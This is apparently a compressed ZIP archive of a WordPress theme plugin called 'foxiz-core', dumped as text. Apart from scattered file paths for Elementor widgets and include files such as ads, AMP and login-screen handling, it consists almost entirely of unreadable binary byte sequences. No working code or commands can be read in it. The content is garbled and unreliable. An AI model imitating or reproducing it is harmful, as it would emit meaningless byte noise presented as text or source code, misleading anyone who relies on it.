1ʽ-M ]Hs|t曦-}S֣#'<<[6^ɲ^{ NTuV{|U8o+7 tS*7abѕsZHal%v<:h3HŎU(]ey;MA,Vˢr6Ѧ R. 14 Q\$K̂%LCwD~=<ߌ=fd-/Cϰסٗ 2vH4I|}MKfL%ls,N1ʲ)oAć ͘|,bY32Mc:oxafXi!QnHx>1#9\V$b8@-Zڹ7ʋm"݇;n nw'G55aN+MLl{p\Pxk.6l(\*0Lǚ|_5#o̗`q,U3Xq*v NW%\#]2@k>|~n1n]|qΧqRR"‰Spx& 9&Z@]ly{#mj@ę-ek/3i55Ay.](m8N&ZL0@PoՀΘT*r[~l>;ڐo@m-PKrQTyk `"foxiz-core/elementor/overlay-1.php\mo8\ %E6nHsRw[ izhEE%7ɒmɤd+RM-9 gƤx?}Ig(PĒS1(MX<9'$LK w|&Z> h#w6 ;cƇ>/?<!Lpuhc?48_1/>˔xutbXQRG.5{pn*`lz9V E%OU6[B1C!C>%+AJf % (!zMqI,%H{SD1 GA-9!ߔUЀb GdCM@P/ɰw_}?tOZCG.bh'$\Я\L='{JH+9 V4A|DXހTZFnTa`hE3Z PTwնV{B5($7!ZÙ o3f0v77%{{x K) h]sǚl EIķh 'SPzӄQ34p9Vb-@ɚobnH32aqJKMuXKc1GwD|w,86Y4欭/yNX/]f2o'P-b Gp'^b!TV- v((K bxmj䗩W" MI(Z8o!ux!Ic '5[FY9E^Dj2U4)I&*-ˈaGY(@'\`juRj刐o3HYy ;r]cgh#3/DфM!+rK8zHfpell: Io_, ahWe-km`0bۢx %g)σ;ΌUKv띲">1Pļf-2k&ݲC"n((8 !c7ǫ>ŀveKb:4VGֈ]ywM5;%q6Qw:I:]mXL=Uq/]&7^A~Nk|mjri_maw[e۔MК V)dOШj rC&u D۾A]nbƕPqtq`Vz)'Ժ,ZzVdFX6prI5v㹢j+,a0%w`#۲ J;Cml^{_uvZk{Ga2O=#4,:~GOTV uBuuG+2dR׏Q"P·8!ao#2FI2p9Wahbn\ؕj%-mDf Е:|'-y,q[Rpn<_x\^vͅxL3eT..r"ji}L&ܠ''Z}pes/hŭcI $z`#~0E /nՙ\,2&~.G'~)ޓ /@87@- o#M?IO(S`) I0<3?홸!M*!$X,mZu^e 8w%G 7WBCiYhT>9673n  EK@R_ŬFxyWMx_`g.-l"lk5Em*N93 6iX].2d΋+?B=3H'8rC4f'-V8@?x2]yJX¨Y#^ɂ7n;z#LiA^mdm5,kuvFZb+%NGUE<+K-Cٷ.F6ZaY]Y)kjP<LN. v#?%qa.*iK]y:t7?\Fg?DzҬ[?$`?SԓZ< ʲUgii/5Ve&_I_9#A'Vꚬ t_k7qĩ e؇!腵7˷aWKo5eOq$ās $̓dzmK3y;``.w8 0o!EX@6B-d(a˰BEsnvlZ I }zaSoB~i~$ 'N@ yT%\nGh^\SthG3xR{71uf k{)#Z$B@F6_F R<׃|}Jvɗu0V1#tiXw`J~% k֢]xV%> XIO5T`"FDTHJy(ŠLNdh9HޭMCxUx$^YԿ}$VWi NS&4 ּ[= ;E7gO=4 K5 8(uPx?yV4O&{S;i?|pTAV=O }X]~PK$PTu+uv"foxiz-core/elementor/overlay-2.php]moۺ%Etfߒ/@dbZmKQNrM$[2)Yr"!ss$gϟpL0@ RL)X]!%8+"gscV|C9?ࡩ"X`GнO٭/^<^1^"DL WBϟEI) YټQ2 |LpY;E[PkABáTB0E.Ej,f~Lq\=D~l)$4H;D!bƂ[\;8A޼-.FR?k+i '\اsqy<<c-2E(`<1o"3?Dܾ{35JOH%p-.&CP?19Wǩw).Bt}ãLd`ABiD Q` 6ԎEqs$9<3Cy~)%Cw= JlCCS!*.(x/*,Jn$t4^3C|U2#/wGC,Lw!$A9xlI@3)&r%?E>,,kBIoZk)d[Hp HHo<t?&2fmfAdnjǶqQjPoM1E,&<&z>:n%WӅb@NcpV] 1j*_; 3WV|]˂kĝKdO?`m˥Eeb 6 k& ݂S(]z7;"Y* gjr vP6E\By{o8OlC'ȔLRC1`d\fw0쒟f$; |˕#-hrZ|Hb2*<4m=}r:tgk̸70g 7 ֽy(mGzf 쳪y-?5 `&ǜ{ {:CT(s/i^Aj!xN9IAt|CK*"D?H=B 뮼Ai OyG`J3]_8"]*F.2#Hamxƾ#0C4Y,tluaiVPY-dJ =y{+RtB7(ߒ0[o ['ޙ4v\[I+4]lRAGm9r;lKY#ueWL! h} Q%DyFPQO!lcƂ9*}uqUi""ahMs8Qq(, ؍"f~ @̮J~䬗բ)ׅb\w]i9 +Ljaӄ9,>A{R,dWjXT ,E«c4|_ū3cYdSN?BlĤl5Um6LJ/Oҏ1+ 6YaԕK #a`7S`K.6_fRY>ʨK-CVʂn/$|%0yѷֵ* ;T,R'$uFףJڑ0ѭ~8q6sHVuتV/\zVp[s֪| v[GIMLr.WDbݳ=A7kIvwk1u&6$lnlVS K),yHԞtR±9b?-ڦl3=!_%A%>XP]uC+;xWۯ?[pjWD ڏwE`!Kԁ^QhAofj}`{o"& .m;?SXS3BFRu+,d«q]d]ZfѶW )Ȧթ.lI[Kl;.fC^רF.A(6 $:ծUد VrK}$t9]/F/mB4&3/oZù_c)p_@H1_-铹D u3N̿m$^sgo);d|j8BkAH7&oDi8߳ hKɶS9w7$GP2DI1bn}ml'_YNWHs24zq}y׋@ gW`:3 RqAnjtd}u!t?mCrҙUcj~Of_)~3EzA~LCߺK;'~ݨh PLzU5VJ߳n =!!d;`5Q*_PKZTس0foxiz-core/elementor/plan.phpZmo8E;:}Zɝ=m;l ƲYH*7lEd7(\yy!g$G2L"6B0a:!01%|A*#7 _/ \#P8XR;DqdthO k@}ѽn>pH:UO.C&Or4j>\,K<9oR0paF԰_Nq)u5ZNզ2< Q8;4qݴ/\1GfUGz%}be!94AX+ћ1q-+rK9 D\HljFcѩ!cXffC "_g+/Y䗩j姏Ǟ~>f&3 vjhf:K͟e{{FId7v&{[6H+V%K賈yRh%)KCYϔQ%%:O0ü7\)d x|BG~|tW[,ΡJMIe}qvGV;<L`B!m/= A #E. FxB@HxV)@`fh%VHrxg-AQo"Cgjʷ sGu|Lƭ Ҁ'ZXDxYAX^G;V=zx Y F86W,;nC7N׹$^'IPץ֬2Pg48TyV:bs^u"}Q \*"N|]Ufՙ'*qTRL4 nQUn*d<É&)(2Oqc WvQG-z"ŷ^48 mV/J\& J#?S@qD nPByTPC:wf<'B\!(CopFg`xj6n%L#=7tP!,+]flrB{}^Ur[N:ꙡYGv:劅.IⱶV5 "'+-[ OØo?f姫O7sʐ@ @W^T(gЋ\PGu熎{-/tzL=o]& y##B #UN|GXdMZ~g/`G6物W~elxV? 8ppѼ,YD׳ 8QezScf22bVS vp>]-UeǞU.v;`f ?呝2Xmu*W<˗q #eBuxw-T녮ȔWF?!Mp}/ %8VF+dB6azG#@!Ӟ躪:.u:A4ױupiq>\erv VkEcs2V}7̈́E6Y\ڧMN^-p|47YɵAU65'4t[|:*V*CVRoMK!R;f:+&UlU:%?0Kd1*_ӣ[7Ib x)29q3/Y]/S^vBvx{r[1 Q.U DgV *ƭo8ͤ'd8a-o5q~S\FS+cLvԽ;Uk+NmBaaoxKéqb_PKZTËl$foxiz-core/elementor/quick-links.phpXmoH aNwBTҗ;BݦmS)w=*pP:E`=/<3ߒUCPa?01b8B@Sg&q$y =y&P ]L$#Q124ʽ.[@~, d|>Jtp a>UP2O{]_ç^Ȣ[ 1 ޔ$ 45~Џ5A&(S1.X% gghE2V͠𽕼 =OEF ScIɏ9*^ڝ0?PQs̙8}DQ1D9~}%*ў/\@^Y&#WL _ Iܚ}-!KPqd ^*JdѲJL_+~4rZA9CB 'V,T^(F:A݀Ϝq.rVq{qDuʣf*ܙ:7Wt!ϫM;EUMJ:Z)4A}%K$!fxPMUB}% &(A  !B;@QZc6=DL-%J/?: (́Ch[8s.r0dQ&L )W*}I)g涜;ݩ`l/ppƃgaW!o&P0nj!?c}0rD%K)_{7O9*3ƫǢE\WjwᾟX9RRZEp4E g%<[gnmh_0C"P{:-oV="< f.kiNUy">Vd>)WC4h5uʖ+i*j{Zy?y\#[s ]Kπ6d%Ӥn{kfz:&hd6+Lks|anݞi*ue/冲||\Ɨl{;V3vw{lC[<[-Q>W*gv0Gj`L|Hj]JHz$&c*9A~XL&8e{p@ mo5)\:ӫ_no.t""%QP)~yl^` z͋-Щq aa+"Ia|ԯulACPٕƫЫ;h*(*}/T0/'%bA#v>p, nh?'`T!m3eޖ h0w)I$>^U!P=IaSh8cSA"7{ɰ ۆ!xf9 ӨDzý^W{x8hyw]I33zV*kk3Eejܷ ݔw{ _` BnLHБ5nBWbƭtr,n8x.3iBUN*kњouDtr8>,E-xPRF2uW>d_imMyΠo7GݫاT|kޫToZҸB:exվ^fobrm+y&1C;%W^=vغc*,m-l͘;lm7\(E8i6=d\<f٤\ʎMhN@ym{->/,UEF,K24T79&2r"x3ǶG,)'DrjUr)XM [jظX徭k4㝳~[=5-)8z,ԣJlY qɰCIgbx}ܫa%5 +a,S8*w00L ztM6\g PvuxՂ}/,/r~󈋚SJG)]!MXǏiA]mu&Q[a>uJdUB[jx XÅq9_'cpXlMA>')DOa_x6x5O%O}1Gٛx ­B ~wk̼,NRAab ?E;Webfԛ3L?cWP~rDqC Jp&_Ƃq ;4OSӸιд?pVNVu XPkQ:s21/V Xxj,!*< x5y53\<ؐoC$Q[?㱫ѐkh.]os6s78:54Hʉ^HVmt Tyؘ7}&m8SFL/ny*$PM#yJa̐ f֪&wJi6`XẸ7fzA 4oIQMȀ軻7}ǖCPKaXTAf foxiz-core/elementor/section.phpWn8}lQTv9I݅z7 $hBMe)ɖ_v G Ϝs?>:8 sppi)t'q%]apA>v 9鴟:i&#;m4EM{g13u.WY0 g𚩙(utsd1*HR;@;Vӆ)F4*L޵Z hY!0C> 6A¹Y0~ ,$1'Dr\M<HIԗ% & q0< Q׳߽zu,C;[ZVս-+t34yH[_kV^eJ@Ŧ̆Jh9"?S,TO%FA$$i3|3T驏%~ATsøAOy=f nv6zɹY ~'hp f`V4ѥM5niK(Uگi,oݠIˎ9? sN$1*u/I \"9q(4)[2]:< .ΗH%x`0Gh :#2c\K;VY5?INID3ڧ΢klh-c_h{nY׿FW$1ͬdJd@\VB B)2-[mJJ뼵T}XW)-5.H\*8d [BW,S t6XEfxf"e.N>J:3 %P ("!_!KN|iNGXayX}G8 R{AB"v2{H Zۭ֭>7CBBZ#J*Wfط N̲Pltlq:)6Ձokwok 237~qC󩃶wrٰClS_do[9|Qw! PK]T46h'(foxiz-core/elementor/social-follower.phpZoHHҝL@!zwK$F4W]*kXawF?xx; Aowfy[[. A mMˈ!bD;)d^'5/ ?{ WM  20f;UBS̸LH@J'1yݡ7h%dnoY}klvc~"CД!צ`X  p->;@G,]`+T\#܆L;Y Qc3\PJelE3ZGoa*#q2 rADWʡB!!;GCLM+dʟAŷM$,$JFK{A- c.0]1cn/37n4zS׾)_ m;:TvSO QtE@_Hkm7f$GdS" 鯀Lj/ i{LD/N~+z n"틒a+(+u\7EHL>KЇ|\DuXPĄ,#)_ Fun9%&&C .)8YsRiIKZ9ÐdL^ϙ ל5AE-Dș E'Ȼf#CzFCRrDjrv%a gХ2^ǩI+=f,/a1 :M,y, "^yqZ*tҐ8Y;ĥyN'afqcXZ9'uwk'Kun>'DcJ#j:+báx78Pp;\}7CkQHqKjJGw2p(mTU^֏ǫVSzw9գUz5e7%OV[Z-^6VK5i95y_ 5pдjwp7xA Vx{F ī=b|v%LnkB讉2Z4jt7O8 F9ggm7u 7ϵjtG/Kݓ'w2c+ b)色kmu~k}ٝ߮ĪZu{uͧι(APVtKXZNse%LE{҇K s`Р)aJ(gtNaǻ7ÛG !ߠ4zv3[:nT̨Vi0TyŻPK VTHP "foxiz-core/elementor/templates.phpVYo1~ Cx*GJR*!,c k{fCH$ س4L{]FCtV|-b"|o{v0^׭Y̌Hb2m4X;p#D{V/:ERhRt#vBAq-M Zc koh`qymCPUX;&]yNT5;U>E7:+\(%p)Ÿi$"=H-S@^Kʛҝ7y:|28*lV<5a|($H\Ѵ1$y@?N%)wofyqQT%&a*8y>,'j3#&6xq~gL. 9 rI aK\3)uSF[ M$ nхpmn-GӪюj*Ktke-#,&4ARvasu\g#_WARUC[3UH%5CƂ.gv"D1o/5 X- or ,/,6{F-$4 ΠLhh PQ:tkmCzl q6&$Rx>TjhC"h+q[2tUr7 e-V(BlqXNR G_'c]GF4 }K{e[GD"Qe4TުV kwqx㜹vs2U:{w;rhK^qA[gJ32O.mw=ۃ]/\~oj#ԠPKZTMrfoxiz-core/elementor/videos.phpXmO9$ÜMPp]4 \u,gwX8+ۛ&eP$lg^Og(C"8C_yT$9O_KrM}:AQ:0ظSd%%T,cDl M<3&8ݳ~wف]4p>6O9FH.9n9xԈkh0gN\ \(= a4̅q4mCuhTD!7ֵ*SKj D|2Z _tޥ7@{ehc:STW{y,)Be3T"B/%pyAA$ru)RQm" 6͉3AVp8!w"y1YpJ1Rf]"0 gͰw3i3q4qĒj4}н'W)RAJ&h;p! KH(RJ{B`È#>_0*)[k3*ubH(LRyr:V2r]ҩ6>!-5M`vU'aR\!npU.M%4VP#S q=ߺ@҈+'& ^lٛa,XЯ I6k-pr>d}iZj))L˂H lSơc[/wq٭2fPfi-@%D ^*1QWrIk3WU܃^Ę!IlvӬp? Hod+yu&fAkM[ 2bmV8=a^WYz*w;wv}ۢMg3.Rᷫ^9z3,cU%Nd?suEqȂ'6nIZGʵM)hZ׈dޒ5D*U@c^u> MlTGN"d6G~<2wq_,fzZ3ך X,$^ɟ'o45tY4uP"}6p'O@eOAE`tjcqwfi8FhBڧ=xHY3#z.㓃8)ӷ>A\8h~iSH#WD4bd@\ԓ4)S>nٔD*~ѨwkǹI\,|{dV;Y|.h,sP]g'bڻ饇`Ѧ6gKf>?r'cJ|vP" `IE]!iD,%ce QWՁHYp @EVoX }`p-/Octkݚdy$QP<(3)Kr?(*|KK\J`q_H_PceFs(P$[*g1O>ի{7zh -CUwUѱʚe^@ْl(.WGT4D*paVo`9_Q+fzZ?svVNz(\|[`5x..Y!zn}^zՠ5VԫMNZ|o3bЁM} D#YfY#|ؓ V`;p)~{/|;, !:uy'7UTM=tzAKSV̿$[t@(+̌yJ C'^ѩ2k TTTR۰)`ݫF,BsEQu(ҏp JS7Z돪FF.aeHr4ٱg+G U(ưzacz1KMFDNUil/$l HCmQndk L^3%U ú*ʖ4f s[$H5m0@NO|]\@:KjAf  %NX#ᖲ6=1JbxuKg=A 0`T:ݺ\6/4I)w'8[tNx.!k΅3 uFʙ*!l3surT#E:*EJ6E4 .~6id:[KP2yvH _Bz,znAI02EW/vKXZ#)/v X>q=>o4:Uw`[BPu=$, n++ %q|rtVҮH+4)J["Σ$Bc1 ;p1yj1T\aݲ RVVgCp)mz %='ZX̜a'CR.\w{7n:r%ו=Gr9xw.? uq7!eF57Pʶvf[L7;͹/2Ʋ{(hn28u@ֿ US0rt٨@wBG1xQ,eWi&v{8TZXΆ(lY\ݐ~| 8yh}vC F&BsyyV/^# ;bcQ*vE,Gr:jONo\x!6{b#]I*ʚTX싓 LLr8V^C2%-dmg T˘wv#\+Fީ=.ۦ]:-X ԩ<h& ¯틀uH[9')[MK-(LdnCxgۖ,#_yM5nɩk϶ ~f](ߵɚӼTL6i4jb~:sro-)({bzޞ-/8;I糼DXF@rM/$a*x%X_ \s<:v$7$<2ř BwKSyi_Kѕr ˶w|`8K`-Wu y_4#Z:`*0m0m0mpX Lo}7&J)YF~tqz*NG_PKR҅ foxiz-core/e-template/single.phpmRn0 =ǀ%iP赵dmm %Uf}n)P@Q#TntiRpk͒@[.@(57XiXlAӷ%;M:MvS><=?ށNoҤ47큷D^U~u~ ͘\ aZr#lWڶ460#AgPrP~?v'Ui̠Єw EwȲAYO'G%H21 PF:k]5˜]džeXUm/ַkc&<}a$(R̒o5Oje ;9I %plO*DG~ļEg9+4bDG'UN:}ZB84\PKQTfoxiz-core/foxiz-core.phpXo69?p@9ElMui`ưf-6c1nw|JN 1^_`>zZ ')=A'&/iSlh-e!Nc)]q%hiexT%+$3M` 1k&4A8`idHk=m`?R8\j^D!O7Zt ΂@2W^n45Y{0cf<.4FDxIȊ sJ;utfFǂ0w]DJe4|zvS=z~@-v6\71 Ws<9ӊM \W!G~mpJ\|0{wިwn'lɠbA5 M òX C2 Hh"żJ Y 6hm1$Iʲc0>of`|d VN͸٢ 0ޅjS̉ujHHĒpAi=eި- fč4,%#"!d1:d':jaJ]jъJ4GkODP<9@˗(8ç013ѭVtEyʻq =$*g:T֘"Igh)Uh&eIFP*}H,c_ႃ03Iܿ-0hEdDMC C$pإhZdآ@PԜVRI.Jø!?GQ؝cÅ=4ыvʱMZWM M][X_ʃF 8\-PF>Cc5`@C ~;{2 oRa,/hq >((vjn0-=֤VFw,sΛpӜ?/cTwiBU=-X)z{A4Sѭ [ dR#rKFHp_zRv _o(!2O(P?`tU{ɒ@ad .8Q4+ΎX4ͫv8:zum+#O]ѫFD`7:@ Te kTfI5;M]2|\@˷/r--;x^w/xnzˤ @'@H:JV BkA7]г$gWY=2n%xDl$'2[{u;{M(67>sD 0Zk d/GWog\BZEo#BzUd0!6_D}*b)|_!E }Cܽ!> $m-u rRT0yuMid86@Pi$$tMAҲ^0KA`桠QpJ%#E&2JDK#`&dN^8 x~ydZm# <|neD^eI* ^Pw,AzM Lzmݨ3N IRN궩B x XY/R'*hi}h_㥂SZyUWJd=WzzU|PK(UTfoxiz-core/include-files.phpn0Ϭ`N)+y"Op*jlOQm8MĻM`G8曱s^AeWEaPEsfV\BcK_tC%^~ )^w<53<)o}~|s!՜2Q]?%,hIzP]WDk.}*4rbcrɡ)Va7zW8hy4ED La'Q|t$冷~ūW#/ 9PM8=a[3-+i_6Gӓ g鉦D҆V$˰~̻ ) 4{ o8Z5 f);t~^݆_qV {x+^76;+*pEvT2~{4-@)5CЂR\펕xz!NM$ rm;.2lovJyQвQ m Ҁ:.FWx*pFTJTF߯55RkGeT[8+gv͎w2 `+-O{+Q#c?iь5Z`ujl zrQ?6{ eCKRJɒ7ćDT K57E> f&-!/ 'trON!v\<[J¤mx%WaiE$'EW"m @$U֎$"1D(659HbԘWLdA |-'W9+"AJV=$+\zrmE.hL/ JˌmA 8*&=+T{C (:HUT+[`7MX<Ă6@m08CyҎ7h rh.%|9$';ꟈTNTOPI  A@ӿ)29a~Í*|Zu.~ 7պ vO1J|(HIi+ĪqDZ7Ƹp%1"\ x}E2 `OZfcx'i}䷽,ܪٷpW3B!ã*zAF1w"'FEOb9?.Cߣ\S@P;Qi|? #j9ep۶93)[AMd4)qt=EbJzA8g~Pi(Tyàr"{.1G6L^BzOBvg|cI6e5pN(80L.y2쑕ͣ]ߌ{6RՂx dJs|tf?3c^K !ƒ<7J)#: ѐ\/j66mVȊpH/rssIH4|ďyBQx wql7=n"ӺG 3*WcZ$-ͮՅ7"eHȹкТ\_]@(`~lWTd>cy4,M cZ*\Ɲu-%.+UZjʖ}/:PVG Îs &'oTmO~:BBi^c՝7DCXpNQc?3VIAZd.o'H!Mo'C  0dOAWw{^1EDq"N@*,0B0cQs;MQRk *ߥ4&$ezTY"`)M!0 0iIw0@Gљ̎cݩ|r9n}݄8֔A:.:}BGXJYٷ"Hr} *|!+T.$q[2P QOmnJ=(V ׹̓LͼՃ(+0a/1 Z VA-d%^1:ݯc4Ěta\te~\YKG(hu~AHwe|C:-xk˱nP9r wB]%iTkZKgob{9wP5=8*$6.b^eW.{O#J=&YpD [!E̽~ &wb䓟)±wq t!FEG>LV 5/Qה:, .q$%cQїQ_PKT9.f$ /foxiz-core/includes/ads.phpko`Fz_~:C!@ @^zAҞw\򥇢@m"=pu}bJrP~_)i{{{w;c+4Ml"yL*cTGUR6tp86y$EӪxJ> q\&[`F[Y "&GEJgH *l*`Ӛ,ȫfČo-Qs0g:D)kRTcKטۋ} Ga QE$'1e0fH&[py(Nj|$p&O'4ar1n0p h  P>ʖ*a˗]X7jF DOn9h] RG!n J2 !mEc +2*s@BI=H7L&K}.&dl\N>ҚUSEl 8 nS1 &lZJ[V~ Ѳ.Ia0լ~H`4ʒ| f .o'zCmOtT&z]hb/Ed9P]EtZ{}Qܧf$tM"?)H}́&԰Z$kBC|h]OF@LRy$OaߥECK/,ٕ&v %ӏLS<_Ot~zc$lj>UIףW%x{=|gcؙޔ"^RP[{Ow3n sT0D촰e#Vvԉw&3*(R6 X nW> U(i1&HV@}Y0MSwLŠQܮ:2e ufQҶoZ] 2p`2Ɨr8䊸 C .e}܍}zn`;OONwavcϏtlig&ssn }~@-c~>.瞠;ɹ鼹',̩'NL9=w@w-ڹ',t=gI?w~-1YMڴ婃VDw&k`FhS7E)-8L28s1yKǭ*q)J܆feƷt*7B [䴵CeGoZ(Ӧj,U#, i:FHD8**}`]c\=}pU _G!~þ/c]lrC@?d~ F_SH$xM(N)î&6<<3~DW.rEIrRA[iZ<Ѻ"auxelވK;/*$=odpYEV`-T2 ς8bsq;ُ׋HU|iUd<,- a4SzXΝg)n-{(z%)Li'tF96UWDf{}Jxo ̠]9$mīO9h"`}v'9O tYbh^{^>rV~[h\vZDT :F8*Q8 OØm98EכBR0b ZH7 u0_ֺ.vU=tfLGEB7?8ZgFgW.ڋg{+F9uUҟօd#~r7p_=PBYMzދE ;'P˝v˫BK.A0XM>ݏ4zWGN<"zhILe NC%,y$8N^`V@~,5$}I/; (M̾ԀF"opV'X ,QB0Fې^bpX46ߝ~!B*ThMH+8nTeQ T^dj<˖h.7q!eNikK~eYh{릖-icQ}3RE$cbVEc$Ŋ'I VGQ,08IGY&jwZpQ8Mބ4\'&j@=?Zl=#)]'<4%-(\T<oYK:iU)G6)6-Gdw*ZjwA%S+>MNHg"uYud6ۖg3ٴ_&U!Gۢ_jغqu{xw_0ޚEx\n[a'dpSUr=.ww˩d$PXvuT֘N]%PKTeCKafoxiz-core/includes/amp.phpXmo6lTr`;Nckn+ЬiKQDZiQ#;] @{sǣFϣEttxvzJ~c'~gĚ3 K/^}txW8:䲞`ZSFÂ_*rdƄJ ) W\:` R-3hL t<03 ɜI  9$H Gq ;IQT͡ԓ bϔ2ESY WXH*æHjC:"͔bk7Y%Ky[]A5 AgN5QKv*X]!ҽI)i)bZQ|QdkftYz(s| nc2钇h2 孇ɕ+@F&QΔ$-0/~Li5R$CgMTjqݥ佼ׯ^MmΩ s]f\)䄾ë{#OͿ̻N7^+]]wɛ9˶|A 2X;h5A) rOJ`)Cߚ+S&t/TޮeF]뢌]6PŪ`?Nۘ;6`䭭^͹%_٪3%4x(o^I(pȃ{Y\?Bn݆L^*4E7^K*.9RJ4!T \Z|-zJq4S aPYs\R12 ABg !20<$'GJ0XedK66=Ԍ!zZ+XNufc= v0m0 L_pndB{mxauF~p\" 鰽%k'Tzz|y7$A"y?{zq<sݻ“@4"6ܶy a2[ڣhŀ~!x $cM) ưi[Ԟ &&etzH T |=~0hСo!ڿz2mզ.j$0:ۙz))!_X6̅t"ݗ%p`!C?5S'#10e`@Ǝ0yZ;t~!!( lUs݃Ⓕxd{B&q?0}<1) QF>=*0l%C\a JI]}̀b*ރZ(lòhsMeH eVoE`{j֔E@H.Ƭ";x>8%ǰC67+Kb]{8;I&0Jx}kk$y.~<b} ́DmUQ]V:=~PK'T?kBfoxiz-core/includes/extras.phpY[OF~R!6Aԓ =ySU !kco-miwbg}MPZ A|3쬙eQ6<\\i%Sqx.&B# %4!/|'d@O^'*Oć5!h񥿦- H]3 YFgA'TG#c'"K``2M z$e&>N&Aӄlυ{$cWcN*H7$& /Q˸ILRPٸ`B:W[EE)cb(R*sX=.>!YךCM6~P!U#X4U+v^0;>7 :YeNxbLkSme){`AX.MD_Pf8&Ł~sʰQ}GUC%^h0ѱx7Mn\6 ZŸ Q15x? ✛D1W5vcTwzj=z|wW,aю|Dq/s}o%qNV57UDhzU~=HBʏT։asŌ4agd~&$@UD)*_TQx?/Ɨńlθl .`ìNY-dX7jɏɒfaGr>czRpqV[5JS7X-`4ӂ*n얱{z;]>TPKQos w$\L-Yȶ(%=3(S-QQ=$LQi4)> JvѭOZbfE!ҥ>HGI  q7Xt" e9x>Rd0I=B\&b"Q()86(+ZFpux]cͩkAGtYR>/ ڃt[/yR]Z-,8d 7|ASS8 8g1Iz"a(>v88'q,WwzOe uwS̠#T`,U<=MK[nnXC1[Gҳb,J-mt`~_gCt(>>en* 2׷Ze'-6=Ov ەxu}ݖM iw'"MrNqÁ<&Lg&qN뚻 ^ha%?^$4lmh<Z0jj8ث+\a2ݚ3*k^ ?lXhG헧lv7 u"NW?%pH:{ i^yc;Iky͕z)D5 PKˍTe}Ofoxiz-core/includes/helpers.phpo~& 6 2Dt8{v'k6 T,RFxƦ$[P.y">cvc{{ >QxM#ןI~ޜmޜSKBJfe!o $LQ|=@iD?)T@\ظ5%ޭ62LS*+5{1Q}6,;$ɳ2|H;b [͸BvYz_Rn$lkIcoPigQڄ53 'C1bH4%2K{OpyqovN}Ԥg^{l0#F\C-1=C5^/\xL#i9S#:R? SҁcvLx25@$PY B԰Ɓ${24 j3㶇,b@ѝ@B {>͞ 9cLk2{ΜA.DPЄ OV~<:Cr͞x#jDS39 qFqjG.f~]F bY:KHBJf`"ާ̟4l#T d Ko0!G-KaB e4xIb8CVާx*A:~6a[J DkAyM-4ĝ06{D28_Oe,S,Yb=!{Nu0 壓`t&Jx\dG]g|jҥp?cfm d:g0` ;uCy~WэFnmq٠f&C'/ [ḰjR7EendRXvQv.MbQNbnVǠلHHNXRva0Y31L^i$<2e"7kh[ә^%yՆbn3)~ݒ  8(bj87Dڭ&@*WrM `RljMa>x00HNC9T0=F'/ФI - uaF.k`h/+ѳr0Q@\g'-Uo`2,x~*ҨF1,k3ws0'|W^cYVE)qta׾2/we}eм7KQ[jm]`b:mMUaVUyDtUA :%Bv>֒:_s"R)7\ {+N"wO8H! haX\Oӳώ4ſܯzW]=>مsv{xttf~ƽb^:?>sx1ؓv>N:E^b_%]/۹p4EM*4Bd5Y$QLJ Tjvn-XM)olŚ]] ^\KQ<|fa3S.&^ޝGN˰a3`UdBStޢC-+jrM~g#(. OU@` Μ5&Vr~]/rvSīΎdTHA䖯BjD6~y ֤ޛIb` p>' _ |q wR{I⎃PPd$n*$vrruءrcmC`^l>ۊbIg|΀&h3yS{Wpo_ " hap[Oh,^ nM>-Sݫ8tDBCBwӘ Mr>bKIBJ0YFeH/d*@1^ǞxO\,GЕ) LqP2g]ݤ505kD -wVrFuߤvaMv^^/ۉ˞DM6^,CmyMD{"-JeR-6rk\1(5@eMt&}6J^n̆Q<ݨ(5,ghϪOiW/ٜ"a/N{}ކYocE% ˳oq4$a۫_OO^vo1;Yd!pٱ` fXGL !пL qvDـg߽a_'e'm00`E8) Tv/mQw;(>\ǔԓ&9MѧBfm.X/Xe*V~m;j ~QXi6(s1M֩b% zP/л۶,1N hPmV6T90 +᱃M-GN~#{1# £99)>vswݺҗ_-*pϟ|Q/YPXh1A$*UXa6TIkk,_g.ǔ{`|b:jxŖ9H$%BmQ{1c=`YF(ڠ2Os 4Z n7ڰ$A(EjӹdcREO: v̈\PKhT+`7$foxiz-core/includes/login-screen.phpXmo6LUNI e](!݆auAmE⸍/HYv s&{w._dqvx0<=E?4($B4  茥4Տ~{/:?_:6ru1]w|R!$0)z4цL  5,v2n(DuY Ґf1Mb.W EW(VlXYͩ%@4^4F>Bi$C* .pDs-nhǪqALtlA]z?Kg}1)PH36aZ=v}Lzȃ:pTQkto(&,O\8EV$8 1]P%")霁r=Cu類t`\'by/ȜH,KU&X Myº71zڣs[bŔDT"iX(j*X&[8YAV)Y*37_-xƵM%lƹl7 jDUen/n4O gOT |S~Œ_\ENjt-!qiWD\ιiq ~.5>m?)3Ԉ{AkϻY-,1TU0eXKTQ)>~RRLo'b!Is<mpF2;Bi[p~~ۿoOL| BמxJj$I7'Q帖Μdp<4wن׺s8nyJG 5ПX[nuuܠaQpSWUqy0ށYM!u61E#޸qB"@S}7%%\;%E:׊!Oצ23N \n$@>yhhAĔc9B?g+j,Y$zzKh?g_WQi㈰FHճjI1`C>oRTAv/ c ";F3+Z:F$L@ZW.(<> a|յ %ʆ `p5 M"`#l+І>KAeϋIԌic|YD "L=^ܮP&>a}&wt#Z(le6 ȝ&H-)^2z׫2iVЮ`+>T~ n´!e5z^EXI΃SICѩ3f唺(*GxOzs>;ip~ 6&Ik:]́/ڌl1F4fݳul5(Qb=xԋ \/HGy300tbzu.Ցhn#ۊK}MuP*r^{`mC2Q UʹNꔴrZƆ֋lUFLBLv * o_c̬I~Ǐ΁9 ]y4PfI h}ʌ8& ctSH:ꉗRH;l 0z:REyA_`]y0 &4eEi 5vQ>l[}ZP]uP񆺀]׬/[!Đ /[D;+G$w>%"MP㤦K%,кc ~}}z=T먮MkVwaXhM_CD/N_ e1@fb +mU%~eo0w2;r`sNCwszWXD`jhӏo?}s6!)~^#e&́$]&[oBJWQS ^9>mD[r,Vlg0>XjvbZ\yb-0+jPE6E7QηM d_dU&"Ӯ ƚ'nm/[L,Gįs鏚lC3:Tc`;~Ķ.va(@Gn! C[]ky57Hiqo}~>-NZj}Ւ/OMԲyΦ,^"S: KiAD1Mǚ w<;u(++qMoסl8L3 jQx1iV^#[a֊ M4pE ^HTWd;c~UI[[>$*pgHTob$D `-j!DmU7Ոy\/m߅uʫF ^ް/%JvuCTJ[kۣIFG_&_;4OpҔybR_eib_ ښmi(=̜= tvڂ09F8YU_%]ok=:jZ$|Wm} w , YouuZCF߳Mo"~HiXNۉlD +PcK;nt]-~'[w ^Cy؀ڛeFQ]5ӧ18mnza]'z]G[Ţ ~ Q!â eŠ9-Zk7sl7aTsL_vdn$i`EAݗk i:4mVh/#.4Jiw\R#7m> (U^n_[/r8ڡnή7D) 